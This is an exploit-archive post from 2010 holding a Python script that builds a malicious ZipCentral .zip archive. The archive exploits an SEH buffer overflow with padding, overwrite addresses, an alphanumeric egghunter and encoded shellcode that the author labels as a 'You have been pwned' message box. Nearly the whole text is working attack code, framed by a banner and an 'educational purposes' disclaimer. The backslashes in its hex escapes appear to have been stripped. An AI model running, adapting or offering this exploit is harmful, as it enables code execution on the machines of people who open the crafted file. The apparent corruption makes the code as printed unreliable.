ZipCentral (.zip) 0day SEH Exploit
Posted on 04 April 2010
================================== ZipCentral (.zip) 0day SEH Exploit ================================== #!/usr/bin/python # # Title: ZipCentral (.zip) 0day SEH exploit # Author: TecR0c - http://tecninja.net/blog & http://twitter.com/TecR0c # Download: http://downloads.pcworld.com/pub/new/utilities/compression/zcsetup.exe # Platform: Windows XP sp3 En (VMWARE) # Greetz to: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # Unfortunately, no one can be told what the Matrix is. You have to see it for yourself! # To be able to make sure your hex values get mangled correctly i have created my own # Mangled Chart: http://tecninja.net/blog/?p=35 # Discription of exploit: http://tecninja.net/blog/?p=73 # You can notice i have used this technique for my PPR and JMPs print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "| http://www.corelan.be:8800 |" print "| security@corelan.be |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] pill (.zip) 0day SEH exploit - by TecR0c" ldf_header = ("x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00" "x00x00x00x00x00x00x00x00" "xe4x0f" "x00x00x00") cdf_header = ("x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00" "x00x00x00x00x00x00x00x00x00" "xe4x0f" "x00x00x00x00x00x00x01x00" "x24x00x00x00x00x00x00x00") eofcdf_header = ("x50x4Bx05x06x00x00x00x00x01x00x01x00" "x12x10x00x00" "x02x10x00x00" "x00x00") #Limit of 50 bytes for the filename #PASSWORDS #filename = ("x50x41x53" #"x53x57xeax52x44x53") #ReadMe filename = ( "x52x65x61x64x4dx65") # ESI - Im going to enjoy watching you die Mr Anderson egghunter = ("VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIBFmQzjk" "OdOw2sb3ZUR68JmVNulUUQJSDJOx867Dpdp64nkKJNOpuKZNOT5JGYokWA") # align ESI for msg - To deny our own impulses is to deny the very thing that makes us human getpc = ("x89x05x5ex41x98x99x41x8ax94x98x98x98") # EDI is chosen thanks to the egghunter - Never send a human to do a machines job msg = ( # TITLE=Corelan TEXT="You have been pwned" "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkOkJy4" "4a4yd4qXRlr2Zp1HIpdNk2Q00lK2VVllKpvglnkg6THNksNUpLKVVWHPOfxRU" "l3ryUQKakOXa50nkPlvDtdLKW5wLlKPTTEPxWqKZLK0J6xnk1JwPVahkM35g1" "YlK7DLKVaXn6Q9o6QkpKLnLMTIP0tTJKq8O4Ms1iWm9hqyo9okOWKQlwTWXae" "knnk0ZUtGqzK1vNk6l0KLKPZuLs1jKLK4Dnkc1m8NiQTwT7lu1O3oBTHGYn4O" "y8eLIKrqxnnPNVnZL3bkXmLKOkOKOK9pETDOKqnKhM2qcmW5Lddcbm8NkKOIo" "KOoyqU4H3XRLrLGPkOu8tsvR6NQte8QeQc0esBoxQLetwzOyKVF6Yo65vdmY9" "RrpmklhoRPMmlowglut2rM8CnKOKO9oQxRLparNqH1xrcPobR2EEaKkmXQLTd" "UWMY9saxBNsUu4shu8RNq0RPqgRHq0QrBE3UU80h3QPvQu58QIBOd5upvQO9m" "XpLutvsK9YqfQN22r63SaaBio8PVQyPpP9oPUS8vjA") buff = filename buff += "x20" * (50-len(buff)) buff += "x57x30x30x54" # If you close your eyes, it almost feels like you're eating runny eggs buff += "x57x30x30x54" # The trace was completed buff += msg # Don't hate me Trinity... I'm just the messenger buff += "x41" * (653-len(buff)) buff += "x89x06x42x42" buff += "x56x29xa5x72" # Welcome to the desert of the real buff += "x41" * 10 buff += getpc buff += egghunter # The digital pimp hard at work buff += "x42" * (4064-len(buff)) buff += ".txt" mefile = open('pill.zip','w'); mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header); mefile.close() # Inj3ct0r.com [2010-04-04]
